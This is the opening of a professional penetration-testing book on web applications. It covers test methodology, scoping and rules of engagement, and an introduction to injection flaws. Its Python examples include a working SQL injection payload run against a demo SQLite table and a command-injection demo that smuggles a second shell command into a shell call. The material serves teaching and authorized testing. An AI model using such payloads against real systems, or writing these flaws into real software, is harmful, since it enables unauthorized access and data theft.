
ARTECH HOUSE INFORMATION SECURITY AND PRIVACY SERIES
INTERNET/COMPUTER SECURITY
The Penetration Tester's Guide to Web Applications

This innovative resource provides both professionals and aspiring professionals with clear guidance on how to identify and exploit common web application vulnerabilities. The book focuses on offensive security and how to attack web applications. It describes each of the Open Web Application Security Project (OWASP) top ten vulnerabilities, including broken authentication, cross-site scripting, and insecure deserialization, and details how to identify and exploit each weakness.

Readers learn to bridge the gap between identifying high-risk vulnerabilities and exploiting those flaws to initiate shell access. The book demonstrates how to work in a professional services space to produce quality and thorough testing results by detailing the requirements of providing a best-of-class penetration testing service. It offers insight into how to approach a web app pen test and the challenge of integrating a mature pen testing program into an organization. Based on the author's many years of first-hand experience, this book provides examples of how to break into user accounts, how to breach systems, and how to configure and wield penetration testing tools.
Serge Borso is the founder and CEO of SpyderSec, an independent security consulting
organization specializing in penetration testing services, OSINT solutions, and security
awareness training programs. He is also an instructor at the SANS Institute and a private
cybersecurity consultant. He received his M.Sc. in computer systems security from
Colorado Technical University.



ISBN 13: 978-1-63081-622-3

ARTECH HOUSE
BOSTON | LONDON
www.artechhouse.com



The Penetration Tester’s
Guide to Web Applications

borso cip.indd i 4/30/2019 2:31:14 PM


For a complete listing of titles in the
Artech House Computer Security Series,
turn to the back of this book.



The Penetration Tester’s
Guide to Web Applications

Serge Borso



Library of Congress Cataloging-in-Publication Data
A catalog record for this book is available from the U.S. Library of Congress.

British Library Cataloguing in Publication Data


A catalogue record for this book is available from the British Library.

Cover design by John Gomes

ISBN 13: 978-1-63081-622-3

© 2019 ARTECH HOUSE


685 Canton Street
Norwood, MA 02062

All rights reserved. Printed and bound in the United States of America. No part of this book
may be reproduced or utilized in any form or by any means, electronic or mechanical, including
photocopying, recording, or by any information storage and retrieval system, without permission
in writing from the publisher.
All terms mentioned in this book that are known to be trademarks or service marks have been
appropriately capitalized. Artech House cannot attest to the accuracy of this information. Use of
a term in this book should not be regarded as affecting the validity of any trademark or service
mark.

10 9 8 7 6 5 4 3 2 1



Contents

Preface vii
1 Introduction 1
2 OWASP A1:2017 Injection 9
3 OWASP A2:2017 Broken Authentication 31
4 OWASP A3:2017 Sensitive Data Exposure 43
5 OWASP A4:2017 XML External Entities (XXE) 55
6 OWASP A5:2017 Broken Access Control 77
7 OWASP A6:2017 Security Misconfiguration 97
8 OWASP A7:2017 Cross-Site Scripting (XSS) 119
9 OWASP A8:2017 Insecure Deserialization 137
10 OWASP A9:2017 Using Components with Known
Vulnerabilities 151
11 OWASP A10:2017 Insufficient Logging and Monitoring 167
12 Beyond the OWASP Top 10 179
13 Testing as a Consultant and Adding Value 195
14 About the Author 199
15 Index 201

Preface
Welcome to the world of web application penetration testing! The purpose
of this book is to explain how a professional penetration tester attacks web
applications. This book will start by providing some background information
on penetration testing and web applications (web apps), discuss why we care
about web applications, and proceed to discuss methodology and attacks. A
primary focus will be on the OWASP top ten: identifying these flaws and
exploiting them in a meaningful way. Throughout the chapters dedicated to
specific vulnerabilities, special attention will be paid to making the content
easy to understand, and each chapter will include examples, real-world stories,
references to hands-on training, and final thoughts on the vulnerability in
question. You will obtain a clear understanding of the details of the flaw,
how to exploit the flaw, and the background information necessary to provide
value to your organization. The world of web applications is vast and trying
to fit everything into one book would not do justice to the reader; thus, some
topics will not be covered in depth in this book.
The target audience of this book is people already performing penetration
testing, primarily in-house penetration tests you conduct as part or all
of your day job. People new to the world of penetration testing, perhaps
researching the topic to help with bug bounty programs, or students should
find it a helpful reference guide for protocol/professionalism and for gaining
technical acumen. Professionals/consultants conducting penetration tests for
clients will be able to leverage this book to enhance their current processes
and skill sets. This book is meant for an audience equipped with intermediate-
level web or application security skills. You should know the inner workings
of TCP/IP, HTTP, and encryption. You should have experience registering
a domain name, configuring a web server, setting up SSH keys and SSL/TLS
certificates, and running a website at a minimum. You should be familiar
with programming languages, know the difference between the web and the
internet, and be aware of OWASP, CVEs, CVSS scoring, and the like.
Beginners or people new to web application penetration testing should be able
to keep pace and understand most of the topics at a high level. Possessing
a background in application security (appsec) will be helpful for fully
understanding some concepts, just as experience with conducting professional
engagements will help the reader understand other topics. Like anything in
life, you will get out of this book what you put in, and as such, it may be in
your best interest to ensure you are well versed in appsec to maximize your
investment.
Penetration testing is different than vulnerability scanning, and web application
penetration testing is significantly different than network penetration
testing. When performing a web application penetration test we follow a four-
step methodology: reconnaissance, mapping, scanning, and exploitation.
Reconnaissance is the act of information gathering and comes in the form
of conducting research into our target organization (industry, location,
employees, products/services, domains, hosting, DNS information, etc.), the
target web application (language, CMS, open-source components, affiliations,
platform/architecture, etc.), avenues of attack, web properties, and general
accumulation of open-source information that we can leverage.
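Recon output piles up quickly. As one illustration of turning that raw material into a target list, the sketch below pulls candidate hostnames for a root domain out of arbitrary text such as saved search results or DNS dumps. The regex and the example domain are assumptions for illustration, not a universal OSINT parser:

```python
import re

def find_hostnames(text: str, root_domain: str) -> list[str]:
    """Pull hostnames under root_domain out of arbitrary recon text
    (saved search results, DNS zone dumps, JavaScript files, etc.)."""
    pattern = re.compile(
        r"\b((?:[a-z0-9-]+\.)+" + re.escape(root_domain) + r")\b",
        re.IGNORECASE,
    )
    # Deduplicate and normalize case before returning a sorted scope list.
    return sorted({m.group(1).lower() for m in pattern.finditer(text)})

# Example: scraping candidate subdomains from a blob of recon output.
blob = "Found dev.example.com and MAIL.example.com; ignore other.org."
print(find_hostnames(blob, "example.com"))
# ['dev.example.com', 'mail.example.com']
```

In practice the input text would come from many sources gathered during this phase, and every candidate host would still need to be verified as in-scope before testing.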
Mapping is how we understand the various relationships between components
of the application. This is accomplished by browsing and spidering/crawling
the application looking for links, submitting forms, paying attention
to how the application behaves, and essentially using the application
as it was intended from a nonmalicious user's perspective. Once a map of
the application has been established, more nefarious interactions with the
application take place via actively scanning for vulnerabilities.
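The crawling described above can be approximated with nothing more than the standard library. The sketch below, using a hypothetical base URL, collects `<a href>` and `<form action>` targets from one page; a real mapper would also fetch pages, maintain session state, and respect scope:

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

class LinkMapper(HTMLParser):
    """Collect link and form targets from one page of the application."""
    def __init__(self, base_url: str):
        super().__init__()
        self.base_url = base_url
        self.links: set[str] = set()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.links.add(urljoin(self.base_url, attrs["href"]))
        elif tag == "form" and attrs.get("action"):
            self.links.add(urljoin(self.base_url, attrs["action"]))

page = '<a href="/login">Login</a><form action="/search"></form>'
mapper = LinkMapper("https://app.example.com/")
mapper.feed(page)
print(sorted(mapper.links))
# ['https://app.example.com/login', 'https://app.example.com/search']
```

An interception proxy's spider does this (and far more) automatically, but writing even a toy version makes clear what the tool is doing on our behalf.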
As a sidebar, note that during the reconnaissance phase it may be apparent
that the content management system (CMS) being used by the application
has a known vulnerability and matching exploit. Attempt to exploit
it. . . spend up to about twenty minutes if the indicators of exploitation
warrant this effort at this phase. Know that there is much more work to be
done in order to get a comprehensive view of the attack surface of the web
application, and this deviation, while warranted, should be minimized if not
readily exploitable. Take note of the potential for abuse and move back to
the predefined methodology for testing.
Scanning is the next step in our four-step methodology and comes in the
form of automated tools and hybrid approaches. Know that in the world of
network penetration testing, Nessus, Rapid7/Nexpose, Qualys, and the like
dominate the market. These are not the only mature tools, but they typically
produce useful results when scanning non-web-based applications. So,
to be clear, these tools are good at finding network and operating system
(OS) level vulnerabilities, but not ideal for identifying web application
vulnerabilities. Finding a quality, affordable, general-purpose web application
vulnerability scanning tool is challenging: there are only a handful of choices,
commercial products are mostly in the $5,000+ range, and the makers of the
network scanning tools mentioned above do offer separate products for just
this purpose. There are several open-source scanning solutions to help, but
most are very specialized (for instance, only supporting scanning of WordPress
applications) or extremely buggy to the point of being almost useless, like
w3af. Yes, I said it; but I don't contribute to the project, so I don't tend
to complain about the seemingly perpetual poor state of the tool.
By far the most popular and most versatile/useful tool in the web application
penetration tester's arsenal is a full-featured interception proxy:
OWASP's Zed Attack Proxy (ZAP) and/or Burp Suite Pro. ZAP is free
and open-source, includes scanning functionality, and is actively maintained.
Burp Suite has a free and a paid version; the pro (paid) version
is less than $500 per user with an annual license and includes a scanning
component. Both tools are Java-based and thus work on most any platform
running Java. These proxies aid in all phases of our testing methodology
and are customizable to meet our needs in terms of what we want to
automate or otherwise accomplish. Expect several examples throughout this
book to reference these and other tools. Other than commercial scanning
tools and an interception proxy, other tools which will be very useful are
sqlmap, nmap, Metasploit, and custom scripts/tools we create ourselves,
along with our browser.
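As a rough idea of how our own scripts' traffic ends up inside such a proxy for inspection, the snippet below points Python's urllib at a local interception listener. 127.0.0.1:8080 is the common out-of-the-box listener for both ZAP and Burp, but your actual listener address is an assumption to verify in the tool's settings:

```python
import urllib.request

# Hypothetical local listener; adjust to match your proxy configuration.
proxy = urllib.request.ProxyHandler({
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
})
opener = urllib.request.build_opener(proxy)
urllib.request.install_opener(opener)
# From here on, urllib.request.urlopen(...) calls traverse the proxy,
# so every request and response appears in the proxy's history.
```

For HTTPS targets you would additionally need to trust the proxy's CA certificate, since the proxy terminates TLS in order to inspect the traffic.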
Know that while scanning may sound automated, the quality of the scan
results (perhaps measured by how many vulnerabilities and true positives are
identified) depends on our skills and the quality of the previously performed
steps in our methodology. For example, and to contrast with network-based
scanning, setting up an unauthenticated scan of a network is almost as simple
as defining the IP addresses to scan, choosing a profile/set of checks to run,
and starting the scan. Conversely, taking this approach for scanning a web
application is a great way to get low-quality results at best. It's helpful to
provide some application scanning tools with the results of the mapping phase
to ensure all components of the application are scanned, since some applications
have complex navigation and make heavy use of client-side code that a number
of automated tools have trouble understanding. In addition, and this will
be a recurring theme, web application scanning tools must be provided with
valid credentials if there is any hope of producing useful results. While this
concept may be foreign to some, it is absolutely imperative (in almost all
cases) that during our web application penetration testing we have credentials
to the application. Ensuring that our tool does not get logged out during its
scanning is also important, as every subsequent HTTP request it makes may
be responded to with the likes of a 302 redirect to the login page, effectively
invalidating the rest of the scan. Special care must also be taken to ensure
the automated scanning does not cause harm to the application, its users,
or the back-end data store in the event that data is corrupted or otherwise
rendered unavailable. We'll talk about precautions to take and go into this
in more detail later in the book, but for now know that scanning takes effort
to do right and can provide useful results as we move to the next phase of
our methodology.
The final phase of our methodology is exploitation, and this comes in two
forms: leveraging the work performed by others, for example when we find
a version number of software, search for a published exploit associated
with that version, and proceed to use it; or performing the research and
testing required to identify a more subtle vulnerability and crafting a working
exploit to take advantage of it. Another very common way to exploit web
application vulnerabilities is by understanding how a class of vulnerability
works, like SQL injection, and identifying that flaw in our target application.
For instance, detailed information specific to your application's SQL injection
vulnerability is not going to be published in most cases, whereas the details
of how to identify and exploit SQL injection in general are well documented.
Depending on your skills and experience, your path to exploitation will vary.
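To make the "class of vulnerability" idea concrete, here is a minimal and deliberately naive heuristic for error-based SQL injection: compare a baseline response against one where a quote character was injected, and look for database error strings that newly appeared. The error fragments listed are common examples, not an exhaustive or authoritative set:

```python
# Common DBMS error fragments that leak into responses when an injected
# quote character breaks the query; exact strings vary by database/driver.
SQL_ERRORS = (
    "you have an error in your sql syntax",   # MySQL
    "unclosed quotation mark",                # Microsoft SQL Server
    "pg::syntaxerror",                        # PostgreSQL
    "sqlite3.operationalerror",               # SQLite
)

def looks_injectable(baseline: str, probed: str) -> bool:
    """Flag a parameter if injecting a quote surfaced a database error
    that was absent from the baseline response."""
    probed_l, baseline_l = probed.lower(), baseline.lower()
    return any(e in probed_l and e not in baseline_l for e in SQL_ERRORS)

print(looks_injectable(
    "<p>No results for: widget</p>",
    "<p>You have an error in your SQL syntax near ''widget''</p>",
))  # True
```

This is only a first indicator; blind and second-order injection produce no such errors, which is exactly why manual analysis stays central to this phase.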
Once exploitation has occurred, our four-step methodology starts over at
reconnaissance, as we now will likely have access to features of the application
that are new to us, such as administrative privilege or the ability to interact
with other users of the application in an unrestricted manner. Know that this
methodology is not meant to stifle our efforts but rather to guide our testing
to produce thorough and quality results in a professional manner; we don't
want to miss out on testing for certain vulnerabilities due to a haphazard
approach.
Also know that there can be significant differences between exploitation
of web application flaws and OS flaws as it pertains to the impact of the
exploitation and the level of access gained. Specifically, and importantly:
scanning a network, finding a vulnerability, matching that vulnerability to
an exploit in Metasploit, and proceeding to gain shell access is not typically
how the process works for web applications. In fact, exploitation of a web
application vulnerability is highly unlikely to yield shell access on the system
and much more likely to impact a given user or the confidentiality of data.
The first class of vulnerabilities we will discuss in depth is injection and,
in fact, these flaws do lead to remote OS access at times. However, as we
progress down the list of the OWASP top ten, many of the vulnerabilities
focus more on users of the application as opposed to the application and
operating system itself.
To set expectations, this book does not contain any zero-day exploits; it
is not focused on network, Wi-Fi, physical, or mobile application penetration
testing; and advanced topics will not be at the forefront of the conversation.
Expect a well-written, easy-to-understand-and-follow narrative with
real-world examples from previously performed testing. There will be detailed
explanations of web application vulnerabilities, in most cases including
background information on the flaw, its associated risk, how to exploit the flaw
in a meaningful way, the root cause of the issue, and in some cases even how it
might be fixed. Special attention will be placed on the offensive nature of the
topic: how to identify and exploit vulnerabilities. Some of the testing and
exploitation techniques discussed will be novel in their approach and execution,
but most will be well-documented, previously discovered paths to exploitation.
The logic behind the attack will be discussed, as will the potential for
business impact and topics of professionalism and quality of testing.
Some people learn best by listening to a lecture and taking notes, others
are visual learners and benefit from videos underscoring a topic, while others
learn best by tactile methods: hands on the keyboard. In order to augment
the chapters and learning objectives in this book, you, as the purchaser of this
book, will have access to online training to enhance your learning experience
and provide more hands-on training. The goal of this book is to help you
become a more proficient web application penetration tester, and hands-on
training is a critical component for your success in this endeavor. Don't expect
to read this book and walk away with superior skills; you need to use this
knowledge to practice, learn, make mistakes, and grow. Expect it to take
years to become proficient; this book, its material, topics, and hands-on
training will help you on your path, but it is your persistence, desire, and
personal drive that will set you apart from others in this field.
Know that web application penetration testing is a subcategory of penetration
testing; it is nuanced, does not rely on the same path to exploitation,
and even the initial path of discovery is different. While this book is
focused on professional penetration testing, and offensive in nature, at the
end of each chapter is a portion dedicated to the conclusion of the vulnerability
and even some actions that can be taken to remediate the finding. This
is important as our job as penetration testers is not to simply break things
and move on, but rather to write a coherent, well-thought-out report that
the client or our place of business can leverage to gain a deep understanding
of the flaw, the path to exploitation, as well as how to fix it.
The purpose of this book is to explain how a professional penetration
tester attacks web applications; the goal of this book is to help you become
a more proficient web application penetration tester; but it's up to you to
get the most out of it! Let's get started, but before we do there is one last
important topic to cover.

Make sure you always obtain explicit written permission from someone
with the authority to grant it prior to engaging in penetration testing, including
using any of the concepts or tools discussed in this book, and understand
the author assumes no responsibility for your actions.
Chapter 1

Introduction
The OWASP Top 10 represents a broad consensus about the most critical
security risks to web applications. During a web application penetration test,
our goal is to attempt to identify vulnerabilities on the OWASP top ten list
as well as other prevalent application-centric vulnerabilities. Before delving
into each vulnerability, we'll take a moment to discuss web application
penetration testing, how to best approach an engagement, as well as background
information we'll need to be successful.
The internet is not the same as the web and a website is not the same as
a web application even though these terms are typically used synonymously.
A website is used to refer to a static HTML document with links, images,
perhaps some CSS and that's about it. Using a website was a common way to
share information in the early days of the web. In contrast, a web application
is dynamic. Dynamic in the sense that it takes input, some form of stimuli,
and processes this input to produce an output. An example of this would
be Google's homepage. As an end user, we submit a query (input) in the
search box, press enter and are presented with search results (output). As
a user of this web application we can see the HTML, CSS, JavaScript, and
images required to render the page in our browser; this can be accomplished
by viewing the source code of the page. What we don't see is the server-side
source code, the Python/C++/Java, as this code is housed and processed
by Google's servers. Our browser reads the client-side code and renders the
page while the server-side code takes our input, parses (reads) it, performs
a series of logic operations such as applying its search algorithm, and looks
up the database contents before returning a subset of that information to
our browser to ultimately show us the search results. This is dynamic; there
is server-side processing, database lookups, and interactivity built into the
platform.
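A toy version of that server-side round trip, with a dictionary standing in for the database, might look like the sketch below; the page data and handler are invented for illustration, and the browser would only ever see the rendered HTML, never this code:

```python
# A toy "database": in a real application this lives on the server,
# invisible to anyone viewing the page source.
PAGES = {
    "owasp": ["OWASP Top 10", "OWASP Testing Guide"],
    "sqli":  ["SQL injection basics"],
}

def handle_search(query: str) -> str:
    """Parse the input, look up matching records, render HTML output."""
    results = [title for key, titles in PAGES.items()
               if query.lower() in key for title in titles]
    items = "".join(f"<li>{t}</li>" for t in results)
    return f"<ul>{items}</ul>" if items else "<p>No results.</p>"

print(handle_search("owasp"))
# <ul><li>OWASP Top 10</li><li>OWASP Testing Guide</li></ul>
```

The key observation for a tester: the `query` parameter is attacker-controlled input that the server parses and processes, which is precisely what creates attack surface.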
This notion of dynamic is an important one as we delve into penetration
testing and hone in on what is called attack surface. When we embark
on assessing the security posture of a target application, the attack surface
is essentially the parts of the target system that are exposed. For a
typical network-based device such as a server, this would be akin to open
ports/listening services, user accounts with access to the system, patch
management, change management, virus updates, replication, and other avenues
that could lead to compromise if manipulated to cause harm. For a website,
there is not much in the way of attack surface, as there is no input that will in
turn be processed once submitted other than by the web server software like
Apache, IIS, or Nginx. For instance, if there is not a database, there is no
risk of SQL injection (SQLi). If there is no input that is processed, then a lot
of the OWASP top ten vulnerabilities are not going to be present. However,
a dynamic web application, as opposed to a static website, is likely going to
have a database and, depending on the application, a significant amount of
input that can be manipulated to potentially cause harm to the target.
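The database point can be demonstrated in a few lines with an in-memory SQLite table: the same classic payload returns every row when input is concatenated into the query string, and nothing when it is bound as a parameter. The table and payload are fabricated for the demonstration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "a1"), ("bob", "b2")])

payload = "nobody' OR '1'='1"

# Vulnerable: attacker input concatenated straight into the query string,
# so the OR clause becomes part of the SQL logic.
vulnerable = conn.execute(
    "SELECT name FROM users WHERE name = '" + payload + "'").fetchall()
print(vulnerable)   # [('alice',), ('bob',)] -- every row comes back

# Safe: the same input bound as a parameter is treated purely as data.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (payload,)).fetchall()
print(safe)         # []
```

This is the simplest illustration of why dynamic input processing equals attack surface; Chapter 2 treats injection in depth.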
The target of our web application penetration testing is of course the web
app, but the attack does not stop there. This book will make the appropriate
distinction between targeting the application and targeting the business or
users of the application, as in the case of XSS. This is important because
impact can be measured in a variety of ways, such as the impact to business
operations in the event of denial of service (DoS). To adequately perform
a web app penetration test, we have to take into consideration the CIA
triad, which should be familiar to all CISSP holders. If any of these three
components (confidentiality, integrity, or availability) is compromised, then
the ability of the target business to do its job in a secure fashion is severely
impaired. As such, from a penetration testing perspective these are some of
the areas where we want to pay special attention when assessing the target
environment.
The target environment is what is defined in the scope of the penetration
test. This will vary depending on the predefined rules of engagement.
To simplify this, let's think about a few different scenarios in which we may
be conducting a web application penetration test. The first scenario is a
development version of our own personal WordPress blog. This blog resides on
a virtual machine on our workstation at home. We update the blog as we
see fit and once satisfied with the changes or new blog posts, we push those
changes to our production blog on the web. In this scenario, we want to test
our development version running on our virtual machine on our network on
our workstation in our own home: We need absolutely no one's permission to
do this test. We completely own every aspect of the target environment
despite the fact that we did not write the WordPress software ourselves. We also
didn't write the Apache software running the website, or the Linux operating
system, or the drivers, or the BIOS, or. . . . The point is that no special
permission is required to conduct this test and we are fully aware of the scope
of what we want tested, in this case only the WordPress web application.
But understand that as we make HTTP(S) requests to our web app, those
requests will be served by Apache, which does run atop an operating system
(OS); thus, while the scope of our test may seem well defined, in fact, the
testing may encompass OS and platform patches/vulnerabilities as well as
TLS and certificate implementation and configuration, which is no longer
strictly testing the web app.
The second scenario to consider is a web application penetration test of
our corporate flagship web app at our place of business. This application
resides on premises in our data center behind multiple layers of security
including an IPS, firewall, and WAF. The business we work for owns the
infrastructure providing the platform for the web application. However, the
codebase is written by a third-party company and our business does not
have access to the source code. As with most mature organizations, there are
multiple versions of this application in multiple environments such as
development, QA, user acceptance testing (UAT), and production (PROD). This
application is required to be tested for regulatory compliance. Which version
of the application do we test? Do we test remotely from the internet, having
our traffic filtered by multiple devices along the way, or internally to
bypass those controls? Do we test using credentials and leverage an automated
scanning tool, and if so, how will that impact other users of the system and
the database? What about permission from the third party maintaining and
releasing the code; do we need their permission to test their application?
Let's talk about these, starting with the scope of the test. The objective
is to perform a web application penetration test of the target web app, which
is required for compliance, so we have to test it or get evidence (and a recent
report) that the company writing the code is performing penetration testing.
This is not the same as static/dynamic code scanning or vulnerability
scanning; recall that penetration testing has different goals than scanning for
vulnerabilities, a specific methodology, potentially high risk for negative
impact, and a significant effort dedicated to the manual component
of the testing. Generally speaking, since the application resides in our
environment, we can test it as we see fit without any need to seek or obtain
approval from the authors of the code (noting that we are not entitled to
reverse engineer the software).
Testing from the internet, having our traffic sent through the firewall, IPS,
and WAF when we are not whitelisted on these devices can result in much
less of a test of the web application and more of a test of these traffic-filtering
devices positioned logically in front of and protecting the web application (as
seen in Figure 1.1). When the objective is to test the web application, I find
it best to either be whitelisted on these devices, test internally to avoid these
devices, or clearly understand and communicate that the results of testing may
be more prone to false negatives. The reason for this is because we want to
identify vulnerabilities on the web application and attempt to quantify the
level of risk: If there is a SQLi flaw on the application and the WAF blocks
our SQLi attacks to the point where we are unaware of the flaw, this type
of testing arguably is not providing the most value to the business if the
objective is to identify application layer vulnerabilities. There may be a time
when the WAF is no longer in place, or not tuned the same way, or a filter
bypass is discovered, or an avenue of attack does not traverse the WAF; all
good reasons as to why the business and application developers would benefit
from learning about the SQLi flaw. An argument from the business on this
logic may bring to light that attackers are going to be sending traffic from
the internet and having their packets filtered; thus, a fair and realistic test
would be to leave those devices in place. This is not illogical and essentially
becomes a discussion to have with the business.
Figure 1.1 This image is meant to depict the general flow of traffic.

In many cases the production version of the application is tested as
opposed to the development, QA, or other versions. There are several reasons
why: First, I think that it would be hard to justify robust, high-quality
penetration testing on all versions of the application; this would be more of
a niche for automated scanning tools. Penetration testing can be expensive,
time-consuming, and, when performed professionally, a significant manual
endeavor. Additionally, if there is a compliance reason to test the web app (it
is in-scope for PCI, HIPAA, HITRUST, part of the system boundary, etc.),
the governing body/auditing team wants to know that the production version
is being tested, not some other version that users are not currently using.
However, it is appropriate to test non-production versions of the application
in some circumstances, such as when we are an independent contractor and
our client tells us what to test, and while we still want to be able to guide the
client to make the best decision for their business, ultimately we need to test
what they want in order to satisfy their needs. As there can be significant
risk with penetration testing and vulnerability scanning alike, testing
something other than the production version of the application can be beneficial
as legitimate users are not going to be impacted by our efforts. If something
breaks there is no production outage or significant negative impact to the
business. What is important to do is to make sure we understand the needs
and capabilities of the client and determine which version of the application
to test based on this information. This brings to light the rules of engagement
for the testing (when to test, what version to test, escalation points, contact
points, types of testing to be performed, scope of testing, etc.).
Bringing this back to our second scenario conversation, at this point it
should be clear we can test the application because we own it and it is on
our network. In addition we will be testing remotely but whitelisting our IP
address(es) to bypass WAF and IPS lters to reduce false negatives, and we
will be testing the production version of the application for compliance rea-
sons. As well, we will indeed be requesting valid credentials in the form of one
or more test accounts and this is why: thoroughness of testing. If we can't
login to the application, how deep can we test and what value do we think is
being provided? Think of a web app with a single login page available with
username and password input elds and a login button. Looking at this one
page, some testing can certainly be performed, such as initial reconnaissance,
research on the platform in use, and potential vulnerabilities associated with
that layer of software as well as brute forcing /dictionary attacks on the au-
thentication portion of the web application (perhaps a bit more but nothing
likely very fruitful depending on the rules of engagement). If we simply tested
this one page for 40 hours and call it a penetration test this would be a disser-
vice. Once a user logs into the application she is presented with an interface
allowing for le uploads, a search feature integrated with a database, mul-
tiple user roles, report generation capabilities, hundreds of dynamic inputs,
and API documentation. Testing these application features provides value,
not trying to guess usernames and passwords for a week.
Understanding how to maximize the quality of our testing is imperative,
as is conveying its importance to the business, so that we provide value
and satisfy the requirements of compliance. This means that we need to
effectively communicate why we need test credentials, why we need to
be whitelisted, and so on. Testing the development version of a WordPress
application in a lab environment obviously does not have the same level of
complexity. Testing a known vulnerable web application for practice is the
same. Testing a web application as part of a bug bounty program requires
less overhead and certainly less discussion and interaction with the business.
Testing a production version of an application used by millions of clients has
a high risk of impact, and the preparation and planning required to provide
a quality test takes effort.
Some readers with experience conducting black-box testing may balk at
the seemingly excessive amount of information and access being requested.
Indeed, in a black-box penetration testing scenario little to no information
is given about the target environment, and in practice this can make for a
challenging, realistic testing scenario. The reality with web app testing, however,
is that we are going to know what the application is (at least the URL),
and for those of us conducting in-house penetration testing we also know the
language, platform specifics, infrastructure and topology details, names of
developers writing the code, and results of the latest automated scanning.
Those of us conducting bug bounty testing are going to have much less
information available at the beginning of the test, but even in this scenario we
are expected to use a test account or otherwise create an account on the
application to use for testing. This is a nuanced difference between network
penetration testing and web application penetration testing.
We discussed performing testing locally in a lab environment as well as
testing third-party code hosted on our own infrastructure. What is very common
today, however, is cloud-hosted applications. Know that no part of the
conversation or our objective changes just because the application is hosted
in the cloud (someone else's data centers) other than approvals. Amazon has
an approval document that is easy to complete/submit and asks questions
like how much bandwidth will be used throughout the course of the test.
Take special note that our cloud provider is typically responsible for security
of the cloud and not security in the cloud. This means that while our virtual
private cloud (VPC) or virtual private server (VPS) is expected to be logically
segmented from other clients sharing the same infrastructure, no one
other than our developers and security team are responsible for securing the
code and platform. Thus, the same controls such as firewalls, IPSs, and WAFs
are still part of the conversation; they are just virtualized and offered as a
service.
To finish the discussion on scoping and rules of engagement/testing
requirements, know that subdomains (host.example.com, host1.example.com,
etc.) may also be in scope but potentially hosted somewhere else completely.
Also, we want to focus, at a minimum, on identifying and exploiting the
OWASP top ten vulnerabilities, knowing that there are many other vulnerabilities
and categories of flaws we need to attempt to identify and exploit.
What OWASP has done with its top ten list is highlight the most common
and impactful flaws affecting web apps, and as such these flaws
will serve as the backdrop of a large portion of this book.
Modern web applications don't have SQLi on the login page; they have
proper security headers in place and employ TLS with a well-configured
certificate and cipher suite. Development frameworks and libraries have built-in
protection for Cross-Site Request Forgery (CSRF/XSRF) and Cross-Site
Scripting (XSS). Cookies and authentication tokens are sufficiently randomized/complex
and set with Secure, HttpOnly, and SameSite flags. PCI dictates
account lockouts, password strength meters are somewhat common, and mature
applications/organizations host their products behind multiple layers
of security. Vulnerabilities that are easy to identify and impactful to exploit are
becoming harder and harder to find. Know your target environment, know the
impetus or driving force behind the penetration test, and plan accordingly to
put yourself into a position to get the best results, because there are vulnerabilities
to be found and exploited. Remember, we want to break into these
applications, gain access to sensitive information, compromise accounts, get
shell access, escalate privilege, and own the environment; do what you need
to in order to set yourself up for success!
Chapter 2

OWASP A1:2017 Injection
OWASP's Definition: Injection flaws, such as SQL, NoSQL, OS, and
LDAP injection, occur when untrusted data is sent to an interpreter as part
of a command or query. The attacker's hostile data can trick the interpreter
into executing unintended commands or accessing data without proper
authorization.

Details: The previous definition is provided by OWASP; this category of injection
flaws has been the number one web application security risk for many
years and can lead to significant negative impact for a business. As alluded
to in the definition, injection comes in several forms, but in essence it is user
input failing to be properly sanitized prior to being interpreted or executed
as code. To understand what this means, let's break down the last statement.
User input is something that a user can submit to a web application, such as a
username and password. Input is not constrained to populating and submitting
text boxes, however, as every piece of data submitted to the web server,
and in turn the application, could conceivably be used by the application in an
unsafe manner. To elaborate on this idea, think of cookies, hidden form fields,
HTTP headers, form data, GET parameters, HTML5 and storage objects...
anything that the client sends to the application can be malicious in nature,
and depending on how the application uses this input, the malicious input coupled
with poor sanitization could lead to an injection flaw. Thus, input can
be thought of as anything sent from the client to the server.
Sanitization of input refers to logical functions in the application's code
being used to remove malicious characters or otherwise normalize the user-provided
data (input) to a trusted state. This can be as simple as taking a
string of characters and removing anything that is not alphanumeric. When
this input is not sanitized (or otherwise rendered benign) there is potential
for exploitation. Cleaning user input is typically performed via the various
libraries the application references to provide the function of input sanitization.
On a very basic level we can think of this from the perspective of
regular expressions: pattern matching. For instance, a sanitization library
may be responsible for stripping all non-alpha characters from the input provided,
thus sanitizing said input to render it safe to process or store in the
database. The library/function looks at the input provided, matches certain
characters, and removes them from the input if they do not
match the desired input of alpha-only characters.
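As a concrete illustration of the pattern-matching approach just described, here is a minimal Python sketch; the function name and the alphanumeric allow-list are our own choices, not taken from any particular application:

```python
import re

def sanitize_alpha(user_input: str) -> str:
    # Allow-list sanitization: remove every character that is not a
    # letter or a digit, rather than trying to escape the bad ones.
    return re.sub(r"[^A-Za-z0-9]", "", user_input)

print(sanitize_alpha("test' OR '1'='1"))  # -> testOR11
```

An allow-list like this is deliberately strict; real applications usually sanitize per field (permitting spaces in a name field, for example) or, better still, sidestep the problem with parameterized queries.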
There is no shortage of potential input (also referred to as attack surface)
in most modern dynamic web applications, and oftentimes sanitization is lacking,
but alone these two elements don't equate to an injection vulnerability.
For there to be a vulnerability, there has to be some logic in the vulnerable
application's code that interprets or otherwise executes the input as code, and even
then, there is no guarantee of an exploitable vulnerability.
The type of application and its backend processing language, operating
system, and employed technologies are all critical elements to understand
when discussing injection, as each of these components may be vulnerable
and each takes a specific course of action to identify and exploit. For instance,
command injection: this class of injection refers to a vulnerability that
allows an attacker to execute operating system commands on the backend
operating system (OS). This leverages a flaw in the application to provide a
level of indirect interaction with the OS. Identifying this type of
flaw requires submitting commands through the application and observing whether
those commands are in turn executed by the OS.
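To make the mechanics concrete, here is a minimal Python sketch of the flaw itself, using echo as a harmless stand-in for a command like ping or nslookup; the function and command are illustrative only:

```python
import subprocess

def lookup_vulnerable(host: str) -> str:
    # VULNERABLE: user input is concatenated into a shell string, so
    # shell metacharacters like ";" start a second OS command.
    cmd = "echo looking up " + host  # stand-in for "nslookup " + host
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout

print(lookup_vulnerable("example.com"))
print(lookup_vulnerable("example.com; echo INJECTED"))  # extra command runs
```

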